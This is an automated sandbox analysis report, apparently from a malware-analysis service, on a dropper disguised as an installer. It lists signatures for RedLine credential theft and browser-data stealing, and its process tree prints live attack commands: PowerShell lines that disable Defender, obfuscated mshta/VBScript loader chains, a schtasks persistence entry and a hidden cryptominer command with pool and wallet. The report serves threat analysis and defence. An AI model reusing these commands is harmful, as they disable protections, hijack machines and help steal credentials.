Resubmissions
27-10-2021 12:55
211027-p592qaegd7 1027-10-2021 05:03
211027-fpnzwaaff8 1026-10-2021 14:24
211026-rqs6rshff8 10Analysis
-
max time kernel
17s -
max time network
1820s -
platform
windows7_x64 -
resource
win7-de-20210920 -
submitted
26-10-2021 14:24
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-en-20211014
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20211014
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-de-20211014
General
-
Target
setup_x86_x64_install.exe
-
Size
5.6MB
-
MD5
8dfefd1f56f2ac4f1869d86edbb4aa8f
-
SHA1
3a65b0920890fd7e8ae751ee15f76de281584010
-
SHA256
433e51a49b84a52cd5f740a12ec46a145d3c14a95e529d4ef32fd250e02829ed
-
SHA512
996a84df42b79c8786f4347b875621a476bd6a0e71d4c61fd47a726fb9f6717051d03d8b381233e7966c1a2150628b8b7986727298a6fc803aea504f96fd934c
Malware Config
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral3/memory/2952-273-0x0000000000418542-mapping.dmp family_redline behavioral3/memory/2960-276-0x0000000000418D2E-mapping.dmp family_redline -
resource yara_rule behavioral3/files/0x0005000000013066-71.dat aspack_v212_v242 behavioral3/files/0x0005000000013066-70.dat aspack_v212_v242 behavioral3/files/0x000600000001267c-72.dat aspack_v212_v242 behavioral3/files/0x000600000001267c-73.dat aspack_v212_v242 behavioral3/files/0x00050000000130d5-77.dat aspack_v212_v242 behavioral3/files/0x00050000000130d5-76.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 22 IoCs
pid Process 1712 setup_installer.exe 2004 setup_install.exe 2028 Tue0985edbf92e08954.exe 952 Tue09c257807a702a4.exe 1704 Tue0978af55b9.exe 1432 Tue097328c1b990.exe 1492 Tue09c1731fe55c7.exe 1232 Tue09c6db969ab9.exe 944 Tue0947ef38552fc.exe 652 Tue09a30919dc5f00.exe 940 Tue09786995c7f02a923.exe 1152 Tue09792fda06e.exe 1848 Tue09264824c4.exe 1576 conhost.exe 880 Tue0956c36b51.exe 2064 Tue0990c8b597f.exe 2092 Tue091e2054cef7.exe 2124 Tue0971aafeebb6f.exe 2164 Tue093cbcf0222440.exe 2228 Tue0990c8b597f.tmp 2336 Tue0990c8b597f.exe 2396 Tue0990c8b597f.tmp -
Loads dropped DLL 64 IoCs
pid Process 1560 setup_x86_x64_install.exe 1712 setup_installer.exe 1712 setup_installer.exe 1712 setup_installer.exe 1712 setup_installer.exe 1712 setup_installer.exe 1712 setup_installer.exe 2004 setup_install.exe 2004 setup_install.exe 2004 setup_install.exe 2004 setup_install.exe 2004 setup_install.exe 2004 setup_install.exe 2004 setup_install.exe 2004 setup_install.exe 960 cmd.exe 804 cmd.exe 2044 cmd.exe 952 Tue09c257807a702a4.exe 952 Tue09c257807a702a4.exe 1084 cmd.exe 992 cmd.exe 1860 cmd.exe 992 cmd.exe 1860 cmd.exe 1492 Tue09c1731fe55c7.exe 1492 Tue09c1731fe55c7.exe 628 cmd.exe 1232 Tue09c6db969ab9.exe 1232 Tue09c6db969ab9.exe 1184 cmd.exe 1560 cmd.exe 1560 cmd.exe 652 Tue09a30919dc5f00.exe 652 Tue09a30919dc5f00.exe 940 Tue09786995c7f02a923.exe 940 Tue09786995c7f02a923.exe 1156 cmd.exe 1156 cmd.exe 1152 Tue09792fda06e.exe 1152 Tue09792fda06e.exe 944 Tue0947ef38552fc.exe 944 Tue0947ef38552fc.exe 1864 cmd.exe 1448 cmd.exe 1448 cmd.exe 1872 services64.exe 1140 cmd.exe 1336 cmd.exe 2064 Tue0990c8b597f.exe 2064 Tue0990c8b597f.exe 1576 conhost.exe 1576 conhost.exe 880 Tue0956c36b51.exe 880 Tue0956c36b51.exe 1832 cmd.exe 1576 conhost.exe 2064 Tue0990c8b597f.exe 2164 Tue093cbcf0222440.exe 2164 Tue093cbcf0222440.exe 2228 Tue0990c8b597f.tmp 2228 Tue0990c8b597f.tmp 2228 Tue0990c8b597f.tmp 2228 Tue0990c8b597f.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 ip-api.com 54 ipinfo.io 55 ipinfo.io 90 ipinfo.io 91 ipinfo.io -
autoit_exe 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral3/files/0x00050000000131f7-173.dat autoit_exe behavioral3/files/0x00050000000131f7-175.dat autoit_exe behavioral3/files/0x00050000000131f7-146.dat autoit_exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 7 IoCs
pid pid_target Process procid_target 1792 952 WerFault.exe 41 2404 940 WerFault.exe 53 3092 1848 WerFault.exe 62 3188 2728 WerFault.exe 89 1788 1044 WerFault.exe 111 3180 1940 WerFault.exe 119 3120 2920 WerFault.exe 108 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1220 schtasks.exe -
Kills process with taskkill 4 IoCs
pid Process 3060 taskkill.exe 1428 taskkill.exe 3272 taskkill.exe 3484 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 36 IoCs
description pid Process Token: SeDebugPrivilege 1704 Tue0978af55b9.exe Token: SeDebugPrivilege 2028 Tue0985edbf92e08954.exe Token: SeCreateTokenPrivilege 2124 Tue0971aafeebb6f.exe Token: SeAssignPrimaryTokenPrivilege 2124 Tue0971aafeebb6f.exe Token: SeLockMemoryPrivilege 2124 Tue0971aafeebb6f.exe Token: SeIncreaseQuotaPrivilege 2124 Tue0971aafeebb6f.exe Token: SeMachineAccountPrivilege 2124 Tue0971aafeebb6f.exe Token: SeTcbPrivilege 2124 Tue0971aafeebb6f.exe Token: SeSecurityPrivilege 2124 Tue0971aafeebb6f.exe Token: SeTakeOwnershipPrivilege 2124 Tue0971aafeebb6f.exe Token: SeLoadDriverPrivilege 2124 Tue0971aafeebb6f.exe Token: SeSystemProfilePrivilege 2124 Tue0971aafeebb6f.exe Token: SeSystemtimePrivilege 2124 Tue0971aafeebb6f.exe Token: SeProfSingleProcessPrivilege 2124 Tue0971aafeebb6f.exe Token: SeIncBasePriorityPrivilege 2124 Tue0971aafeebb6f.exe Token: SeCreatePagefilePrivilege 2124 Tue0971aafeebb6f.exe Token: SeCreatePermanentPrivilege 2124 Tue0971aafeebb6f.exe Token: SeBackupPrivilege 2124 Tue0971aafeebb6f.exe Token: SeRestorePrivilege 2124 Tue0971aafeebb6f.exe Token: SeShutdownPrivilege 2124 Tue0971aafeebb6f.exe Token: SeDebugPrivilege 2124 Tue0971aafeebb6f.exe Token: SeAuditPrivilege 2124 Tue0971aafeebb6f.exe Token: SeSystemEnvironmentPrivilege 2124 Tue0971aafeebb6f.exe Token: SeChangeNotifyPrivilege 2124 Tue0971aafeebb6f.exe Token: SeRemoteShutdownPrivilege 2124 Tue0971aafeebb6f.exe Token: SeUndockPrivilege 2124 Tue0971aafeebb6f.exe Token: SeSyncAgentPrivilege 2124 Tue0971aafeebb6f.exe Token: SeEnableDelegationPrivilege 2124 Tue0971aafeebb6f.exe Token: SeManageVolumePrivilege 2124 Tue0971aafeebb6f.exe Token: SeImpersonatePrivilege 2124 Tue0971aafeebb6f.exe Token: SeCreateGlobalPrivilege 2124 Tue0971aafeebb6f.exe Token: 31 2124 Tue0971aafeebb6f.exe Token: 32 2124 Tue0971aafeebb6f.exe Token: 33 2124 Tue0971aafeebb6f.exe Token: 34 2124 Tue0971aafeebb6f.exe Token: 35 2124 Tue0971aafeebb6f.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 944 Tue0947ef38552fc.exe 944 Tue0947ef38552fc.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 944 Tue0947ef38552fc.exe 944 Tue0947ef38552fc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1560 wrote to memory of 1712 1560 setup_x86_x64_install.exe 28 PID 1560 wrote to memory of 1712 1560 setup_x86_x64_install.exe 28 PID 1560 wrote to memory of 1712 1560 setup_x86_x64_install.exe 28 PID 1560 wrote to memory of 1712 1560 setup_x86_x64_install.exe 28 PID 1560 wrote to memory of 1712 1560 setup_x86_x64_install.exe 28 PID 1560 wrote to memory of 1712 1560 setup_x86_x64_install.exe 28 PID 1560 wrote to memory of 1712 1560 setup_x86_x64_install.exe 28 PID 1712 wrote to memory of 2004 1712 setup_installer.exe 29 PID 1712 wrote to memory of 2004 1712 setup_installer.exe 29 PID 1712 wrote to memory of 2004 1712 setup_installer.exe 29 PID 1712 wrote to memory of 2004 1712 setup_installer.exe 29 PID 1712 wrote to memory of 2004 1712 setup_installer.exe 29 PID 1712 wrote to memory of 2004 1712 setup_installer.exe 29 PID 1712 wrote to memory of 2004 1712 setup_installer.exe 29 PID 2004 wrote to memory of 616 2004 setup_install.exe 31 PID 2004 wrote to memory of 616 2004 setup_install.exe 31 PID 2004 wrote to memory of 616 2004 setup_install.exe 31 PID 2004 wrote to memory of 616 2004 setup_install.exe 31 PID 2004 wrote to memory of 616 2004 setup_install.exe 31 PID 2004 wrote to memory of 616 2004 setup_install.exe 31 PID 2004 wrote to memory of 616 2004 setup_install.exe 31 PID 2004 wrote to memory of 1416 2004 setup_install.exe 32 PID 2004 wrote to memory of 1416 2004 setup_install.exe 32 PID 2004 wrote to memory of 1416 2004 setup_install.exe 32 PID 2004 wrote to memory of 1416 2004 setup_install.exe 32 PID 2004 wrote to memory of 1416 2004 setup_install.exe 32 PID 2004 wrote to memory of 1416 2004 setup_install.exe 32 PID 2004 wrote to memory of 1416 2004 setup_install.exe 32 PID 1416 wrote to memory of 292 1416 cmd.exe 33 PID 1416 wrote to memory of 292 1416 cmd.exe 33 PID 1416 wrote to memory of 292 1416 cmd.exe 33 PID 1416 wrote to memory of 292 1416 cmd.exe 33 PID 616 wrote to memory of 900 616 cmd.exe 34 PID 616 wrote to memory of 900 616 cmd.exe 34 PID 616 wrote to memory of 900 616 cmd.exe 34 PID 616 wrote to memory of 900 616 cmd.exe 34 PID 616 wrote to memory of 900 616 cmd.exe 34 PID 616 wrote to memory of 900 616 cmd.exe 34 PID 616 wrote to memory of 900 616 cmd.exe 34 PID 1416 wrote to memory of 292 1416 cmd.exe 33 PID 1416 wrote to memory of 292 1416 cmd.exe 33 PID 1416 wrote to memory of 292 1416 cmd.exe 33 PID 2004 wrote to memory of 960 2004 setup_install.exe 35 PID 2004 wrote to memory of 960 2004 setup_install.exe 35 PID 2004 wrote to memory of 960 2004 setup_install.exe 35 PID 2004 wrote to memory of 960 2004 setup_install.exe 35 PID 2004 wrote to memory of 960 2004 setup_install.exe 35 PID 2004 wrote to memory of 960 2004 setup_install.exe 35 PID 2004 wrote to memory of 960 2004 setup_install.exe 35 PID 2004 wrote to memory of 804 2004 setup_install.exe 36 PID 2004 wrote to memory of 804 2004 setup_install.exe 36 PID 2004 wrote to memory of 804 2004 setup_install.exe 36 PID 2004 wrote to memory of 804 2004 setup_install.exe 36 PID 2004 wrote to memory of 804 2004 setup_install.exe 36 PID 2004 wrote to memory of 804 2004 setup_install.exe 36 PID 2004 wrote to memory of 804 2004 setup_install.exe 36 PID 2004 wrote to memory of 1084 2004 setup_install.exe 37 PID 2004 wrote to memory of 1084 2004 setup_install.exe 37 PID 2004 wrote to memory of 1084 2004 setup_install.exe 37 PID 2004 wrote to memory of 1084 2004 setup_install.exe 37 PID 2004 wrote to memory of 1084 2004 setup_install.exe 37 PID 2004 wrote to memory of 1084 2004 setup_install.exe 37 PID 2004 wrote to memory of 1084 2004 setup_install.exe 37 PID 960 wrote to memory of 2028 960 cmd.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
PID:616 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵PID:900
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:292
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0985edbf92e08954.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:960 -
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue0985edbf92e08954.exeTue0985edbf92e08954.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2028
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09c257807a702a4.exe4⤵
- Loads dropped DLL
PID:804 -
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue09c257807a702a4.exeTue09c257807a702a4.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:952 -
C:\Users\Admin\Pictures\Adobe Films\J_NIlXjWSBSpSzAzlzSh2Y4m.exe"C:\Users\Admin\Pictures\Adobe Films\J_NIlXjWSBSpSzAzlzSh2Y4m.exe"6⤵PID:1164
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 952 -s 7166⤵
- Program crash
PID:1792
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue097328c1b990.exe4⤵
- Loads dropped DLL
PID:1084 -
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue097328c1b990.exeTue097328c1b990.exe5⤵
- Executes dropped EXE
PID:1432
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0978af55b9.exe4⤵
- Loads dropped DLL
PID:2044 -
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue0978af55b9.exeTue0978af55b9.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1704 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:3020
-
C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"7⤵PID:1820
-
C:\Users\Admin\AppData\Roaming\1834371.exe"C:\Users\Admin\AppData\Roaming\1834371.exe"8⤵PID:3352
-
-
C:\Users\Admin\AppData\Roaming\5864827.exe"C:\Users\Admin\AppData\Roaming\5864827.exe"8⤵PID:3676
-
-
C:\Users\Admin\AppData\Roaming\8339713.exe"C:\Users\Admin\AppData\Roaming\8339713.exe"8⤵PID:3768
-
-
C:\Users\Admin\AppData\Roaming\6936789.exe"C:\Users\Admin\AppData\Roaming\6936789.exe"8⤵PID:3884
-
-
C:\Users\Admin\AppData\Roaming\6432149.exe"C:\Users\Admin\AppData\Roaming\6432149.exe"8⤵PID:4008
-
-
C:\Users\Admin\AppData\Roaming\4499329.exe"C:\Users\Admin\AppData\Roaming\4499329.exe"8⤵PID:4028
-
-
C:\Users\Admin\AppData\Roaming\5783515.exe"C:\Users\Admin\AppData\Roaming\5783515.exe"8⤵PID:4020
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"9⤵PID:3288
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵PID:768
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"7⤵PID:2920
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 8928⤵
- Program crash
PID:3120
-
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"7⤵PID:3068
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵PID:3008
-
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵PID:1044
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1044 -s 14408⤵
- Program crash
PID:1788
-
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"7⤵PID:2912
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵PID:3048
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"9⤵PID:3440
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi10⤵PID:3476
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )11⤵PID:3524
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"12⤵PID:3856
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )11⤵PID:1216
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC12⤵PID:3536
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"13⤵PID:2764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "13⤵PID:2904
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC13⤵PID:2904
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"10⤵
- Kills process with taskkill
PID:3484
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:2768
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:3196
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
PID:3272
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\juanli-game.exe"C:\Users\Admin\AppData\Local\Temp\juanli-game.exe"7⤵PID:2736
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵PID:2668
-
-
C:\Users\Admin\AppData\Local\Temp\10.exe"C:\Users\Admin\AppData\Local\Temp\10.exe"7⤵PID:1940
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1940 -s 14128⤵
- Program crash
PID:3180
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵PID:2056
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵PID:4040
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:3736
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
- Creates scheduled task(s)
PID:1220
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:3584
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe10⤵
- Loads dropped DLL
PID:1872 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵PID:1612
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"12⤵PID:2532
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"13⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1576
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth12⤵PID:3756
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09c6db969ab9.exe4⤵
- Loads dropped DLL
PID:992 -
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue09c6db969ab9.exeTue09c6db969ab9.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1232 -
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue09c6db969ab9.exeC:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue09c6db969ab9.exe6⤵PID:2960
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09a30919dc5f00.exe4⤵
- Loads dropped DLL
PID:1184 -
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue09a30919dc5f00.exeTue09a30919dc5f00.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:652 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscrIPT: CLosE( creatEobjeCt("WSCRIpt.Shell" ).RUN( "C:\Windows\system32\cmd.exe /R TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue09a30919dc5f00.exe"" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 & If """" == """" for %b In (""C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue09a30919dc5f00.exe"" ) do taskkill /f /iM ""%~Nxb"" " , 0 , TRUe ) )6⤵PID:1992
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue09a30919dc5f00.exe" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 &If "" == "" for %b In ("C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue09a30919dc5f00.exe" ) do taskkill /f /iM "%~Nxb"7⤵PID:2896
-
C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u868⤵PID:3044
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscrIPT: CLosE( creatEobjeCt("WSCRIpt.Shell" ).RUN( "C:\Windows\system32\cmd.exe /R TYPe ""C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe"" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 & If ""-PhwqM9LteEkjDz5gZPyhw9N49u86 "" == """" for %b In (""C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe"" ) do taskkill /f /iM ""%~Nxb"" " , 0 , TRUe ) )9⤵PID:2072
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 &If "-PhwqM9LteEkjDz5gZPyhw9N49u86 " == "" for %b In ("C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe" ) do taskkill /f /iM "%~Nxb"10⤵PID:2428
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscrIpT:cloSE (cREateObJEct( "wsCRipt.SheLl" ).rUn( "Cmd.exe /q /R ecHo | sEt /P = ""MZ"" > ~dWBNpV.F & Copy /b /y ~dWbNpV.F +YsLNPQ.k + 9Jd86KPL.RS + 6VTZU.XA8+CQ3X0._+ 3hAXC.X ..\2GBhNGG.N &sTaRt msiexec.exe /y ..\2GbhNGG.n & DEl /Q * " ,0, TRue))9⤵PID:1096
-
